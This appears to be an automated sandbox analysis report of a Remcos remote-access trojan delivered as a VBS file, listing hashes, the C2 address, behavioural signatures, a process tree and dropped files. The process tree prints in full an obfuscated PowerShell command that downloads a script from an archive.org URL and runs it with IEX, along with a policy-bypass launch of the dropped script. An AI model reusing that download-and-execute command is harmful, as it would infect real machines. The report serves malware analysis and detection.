Analysis
- max time kernel: 150s
- max time network: 149s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 20-04-2021 06:00
- Static task: static1
- Behavioral task: behavioral1
- Sample: Appraisal11002275444900.vbs
- Resource: win7v20210408
General
- Target: Appraisal11002275444900.vbs
- Size: 662B
- MD5: 8da164753530662b1f603f7b23413223
- SHA1: 18a3665edcb3b3d3c53f9755bc225569a64ae642
- SHA256: b61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388
- SHA512: b3c8b9e85c2ab36abf02b479e68287890d94f8c125151ed88f8f26a509444de8207835b51131eee1095f7f3bf37e284e6853ff3b9aa63e91781f2e93b68e95c0
Malware Config
- Extracted family: remcos
- C2: 194.5.97.183:8888
Signatures
- Blocklisted process makes network request (4 IoCs)
  flow  pid   process
  6     2020  powershell.exe
  8     2020  powershell.exe
  10    2020  powershell.exe
  12    2020  powershell.exe
- Suspicious use of SetThreadContext (1 IoC)
  description                          pid   process         target process
  PID 1772 set thread context of 1016  1772  powershell.exe  aspnet_regbrowsers.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (30 IoCs)
  pid   process         entries
  2020  powershell.exe  2
  1772  powershell.exe  28
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   process
  Token: SeDebugPrivilege  2020  powershell.exe
  Token: SeDebugPrivilege  1772  powershell.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  pid   process
  1016  aspnet_regbrowsers.exe
- Suspicious use of WriteProcessMemory (43 IoCs)
  description                       pid   process         target process          entries
  PID 484 wrote to memory of 2020   484   WScript.exe     powershell.exe          3
  PID 2020 wrote to memory of 1772  2020  powershell.exe  powershell.exe          3
  PID 1772 wrote to memory of 868   1772  powershell.exe  aspnet_regbrowsers.exe  4
  PID 1772 wrote to memory of 816   1772  powershell.exe  aspnet_regbrowsers.exe  4
  PID 1772 wrote to memory of 668   1772  powershell.exe  aspnet_regbrowsers.exe  4
  PID 1772 wrote to memory of 1092  1772  powershell.exe  aspnet_regbrowsers.exe  4
  PID 1772 wrote to memory of 1132  1772  powershell.exe  aspnet_regbrowsers.exe  4
  PID 1772 wrote to memory of 288   1772  powershell.exe  aspnet_regbrowsers.exe  4
  PID 1772 wrote to memory of 1016  1772  powershell.exe  aspnet_regbrowsers.exe  13
Processes
- [depth 1] C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisal11002275444900.vbs"
  Signatures: Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601405.us.archive.org/15/items/all_20210407_20210407_0728/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X
    Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
      Signatures: Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe (7 instances)
        Command line (each instance): "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        Signatures: none on the first six instances; the seventh instance: Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: 023e3629230c97ee512ba0b1b5a0f4c5
  SHA1: bc844320b29d8b0f7b8861c4bf4a5ccafda9ee06
  SHA256: 54f54a146f091777c976f8232e1985dec68bc2b46ed183bb3e31352c8d254896
  SHA512: da2161879a243a1930daf9c65f8e879cc5899ec23496c3f1c328a89a3fc6b0958c36891d42c030e899ddaa8c760f1297a2337db5fb5f5f0a8b7c89063e2a0894
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 7f551a39dcd11eac4c89c54ebdef73cf
  SHA1: 4580923df7981be10e3580028b9ed3124989efb2
  SHA256: b578ca32295c5cdcebcacc975ea0b8f9e07e0538a1c9e6998740d63bce457785
  SHA512: e48a4db57128216aae1460de9df8dc54cb32c32d55dc9afb18424dc26096ded254c25913481f83a8d295f7d4e0945fd50b1bcfa8efbb029cee18cbf3fd5d7f0e
- C:\Users\Public\ Microsoft.ps1
  MD5: b5795726bb04f5f9584184ae1f50777b
  SHA1: 91b250e76c41066a009b70200c5254a40980228b
  SHA256: 5d9ba7ab51a7d06ad420cb23f7c1e02b911fe2e25d7af1eebe25d1690231d784
  SHA512: 10ba2e523af4ccdf3e1e0867aa4d50a58919f5d39073bac17a8ab491f5ce09bcbda0730b9485a503adccfa323642b19e29879a0ad88f609d683080b668ef95fb